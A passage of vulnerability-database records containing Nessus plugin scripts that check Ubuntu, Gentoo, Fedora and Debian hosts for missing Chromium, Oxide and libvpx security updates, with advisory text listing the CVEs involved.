value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqt-qmlplugin\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'liboxideqt-qmlplugin', 'pkgver': '1.7.8-0ubuntu0.14.04.1'},\n {'osver': '14.04', 'pkgname': 'liboxideqtcore0', 'pkgver': '1.7.8-0ubuntu0.14.04.1'},\n {'osver': '14.04', 'pkgname': 'liboxideqtquick0', 'pkgver': '1.7.8-0ubuntu0.14.04.1'},\n {'osver': '14.04', 'pkgname': 'oxideqmlscene', 'pkgver': '1.7.8-0ubuntu0.14.04.1'},\n {'osver': '14.04', 'pkgname': 'oxideqt-chromedriver', 'pkgver': '1.7.8-0ubuntu0.14.04.1'},\n {'osver': '14.04', 'pkgname': 'oxideqt-codecs', 'pkgver': '1.7.8-0ubuntu0.14.04.1'},\n {'osver': '14.04', 'pkgname': 'oxideqt-codecs-extra', 'pkgver': '1.7.8-0ubuntu0.14.04.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'liboxideqt-qmlplugin / liboxideqtcore0 / liboxideqtquick0 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:09:40", "description": "The remote host is affected by the vulnerability described in GLSA-201506-04 (Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker can cause arbitrary remote code execution, Denial of Service or bypass of security mechanisms.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2015-06-23T00:00:00", "type": "nessus", "title": "GLSA-201506-04 : Chromium: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234", "CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1243", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1250", "CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201506-04.NASL", "href": "https://www.tenable.com/plugins/nessus/84332", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201506-04.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84332);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\", \"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\", \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1243\", \"CVE-2015-1244\", \"CVE-2015-1245\", \"CVE-2015-1246\", \"CVE-2015-1247\", \"CVE-2015-1248\", \"CVE-2015-1250\", \"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_bugtraq_id(73484, 73486, 74165, 74389, 74723, 74727);\n script_xref(name:\"GLSA\", value:\"201506-04\");\n\n script_name(english:\"GLSA-201506-04 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201506-04\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker can cause arbitrary remote code execution, Denial of\n Service or bypass of security mechanisms.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201506-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-43.0.2357.65'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 43.0.2357.65\"), vulnerable:make_list(\"lt 43.0.2357.65\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:16:39", "description": "libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384 to avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "nessus", "title": "Fedora 21 : libvpx-1.3.0-7.fc21 (2015-15935)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libvpx", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-15935.NASL", "href": "https://www.tenable.com/plugins/nessus/86275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-15935.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86275);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1258\");\n script_xref(name:\"FEDORA\", value:\"2015-15935\");\n\n script_name(english:\"Fedora 21 : libvpx-1.3.0-7.fc21 (2015-15935)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix\nCVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to\nfix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384\nto avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223266\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-October/168803.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1f438175\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvpx package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libvpx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"libvpx-1.3.0-7.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvpx\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T16:01:49", "description": "libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384 to avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-09-21T00:00:00", "type": "nessus", "title": "Fedora 23 : libvpx-1.4.0-5.fc23 (2015-15934)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libvpx", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2015-15934.NASL", "href": "https://www.tenable.com/plugins/nessus/86043", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-15934.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86043);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1258\");\n script_xref(name:\"FEDORA\", value:\"2015-15934\");\n\n script_name(english:\"Fedora 23 : libvpx-1.4.0-5.fc23 (2015-15934)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix\nCVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to\nfix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384\nto avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223266\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166975.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?32eb20c8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvpx package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libvpx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"libvpx-1.4.0-5.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvpx\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:15:18", "description": "libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384 to avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-09-25T00:00:00", "type": "nessus", "title": "Fedora 22 : libvpx-1.3.0-7.fc22 (2015-15936)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libvpx", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-15936.NASL", "href": "https://www.tenable.com/plugins/nessus/86131", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-15936.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86131);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1258\");\n script_xref(name:\"FEDORA\", value:\"2015-15936\");\n\n script_name(english:\"Fedora 22 : libvpx-1.3.0-7.fc22 (2015-15936)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix\nCVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to\nfix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384\nto avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223266\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/167428.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5a715f2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvpx package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libvpx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"libvpx-1.3.0-7.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvpx\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:11:28", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\n - CVE-2015-1266 Intended access restrictions could be bypassed for certain URLs like chrome://gpu.\n\n - CVE-2015-1267 A way to bypass the Same Origin Policy was discovered.\n\n - CVE-2015-1268 Mariusz Mlynski also discovered a way to bypass the Same Origin Policy.\n\n - CVE-2015-1269 Mike Rudy discovered that hostnames were not properly compared in the HTTP Strict Transport Policy and HTTP Public Key Pinning features, which could allow those access restrictions to be bypassed.\n\n - CVE-2015-1270 Atte Kettunen discovered an uninitialized memory read in the ICU library.\n\n - CVE-2015-1271 cloudfuzzer discovered a buffer overflow in the pdfium library.\n\n - CVE-2015-1272 Chamal de Silva discovered race conditions in the GPU process implementation.\n\n - CVE-2015-1273 makosoft discovered a buffer overflow in openjpeg, which is used by the pdfium library embedded in chromium.\n\n - CVE-2015-1274 andrewm.bpi discovered that the auto-open list allowed certain file types to be executed immediately after download.\n\n - CVE-2015-1276 Colin Payne discovered a use-after-free issue in the IndexedDB implementation.\n\n - CVE-2015-1277 SkyLined discovered a use-after-free issue in chromium's accessibility implementation.\n\n - CVE-2015-1278 Chamal de Silva discovered a way to use PDF documents to spoof a URL.\n\n - CVE-2015-1279 mlafon discovered a buffer overflow in the pdfium library.\n\n - CVE-2015-1280 cloudfuzzer discovered a memory corruption issue in the SKIA library.\n\n - CVE-2015-1281 Masato Knugawa discovered a way to bypass the Content Security Policy.\n\n - CVE-2015-1282 Chamal de Silva discovered multiple use-after-free issues in the pdfium library.\n\n - CVE-2015-1283 Huzaifa Sidhpurwala discovered a buffer overflow in the expat library.\n\n - CVE-2015-1284 Atte Kettunen discovered that the maximum number of page frames was not correctly checked.\n\n - CVE-2015-1285 gazheyes discovered an information leak in the XSS auditor, which normally helps to prevent certain classes of cross-site scripting problems.\n\n - CVE-2015-1286 A cross-site scripting issue was discovered in the interface to the v8 JavaScript library.\n\n - CVE-2015-1287 filedescriptor discovered a way to bypass the Same Origin Policy.\n\n - CVE-2015-1288 Mike Ruddy discovered that the spellchecking dictionaries could still be downloaded over plain HTTP (related to CVE-2015-1263 ).\n\n - CVE-2015-1289 The chrome 44 development team found and fixed various issues during internal auditing.\n\nIn addition to the above issues, Google disabled the hotword extension by default in this version, which if enabled downloads files without the user's intervention.", "cvss3": {}, "published": "2015-07-27T00:00:00", "type": "nessus", "title": "Debian DSA-3315-1 : chromium-browser - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1263", "CVE-2015-1266", "CVE-2015-1267", "CVE-2015-1268", "CVE-2015-1269", "CVE-2015-1270", "CVE-2015-1271", "CVE-2015-1272", "CVE-2015-1273", "CVE-2015-1274", "CVE-2015-1276", "CVE-2015-1277", "CVE-2015-1278", "CVE-2015-1279", "CVE-2015-1280", "CVE-2015-1281", "CVE-2015-1282", "CVE-2015-1283", "CVE-2015-1284", "CVE-2015-1285", "CVE-2015-1286", "CVE-2015-1287", "CVE-2015-1288", "CVE-2015-1289"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium-browser", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3315.NASL", "href": "https://www.tenable.com/plugins/nessus/84992", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3315. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84992);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1266\", \"CVE-2015-1267\", \"CVE-2015-1268\", \"CVE-2015-1269\", \"CVE-2015-1270\", \"CVE-2015-1271\", \"CVE-2015-1272\", \"CVE-2015-1273\", \"CVE-2015-1274\", \"CVE-2015-1276\", \"CVE-2015-1277\", \"CVE-2015-1278\", \"CVE-2015-1279\", \"CVE-2015-1280\", \"CVE-2015-1281\", \"CVE-2015-1282\", \"CVE-2015-1283\", \"CVE-2015-1284\", \"CVE-2015-1285\", \"CVE-2015-1286\", \"CVE-2015-1287\", \"CVE-2015-1288\", \"CVE-2015-1289\");\n script_bugtraq_id(75332, 75333, 75334, 75336, 75973);\n script_xref(name:\"DSA\", value:\"3315\");\n\n script_name(english:\"Debian DSA-3315-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in the chromium web browser.\n\n - CVE-2015-1266\n Intended access restrictions could be bypassed for\n certain URLs like chrome://gpu.\n\n - CVE-2015-1267\n A 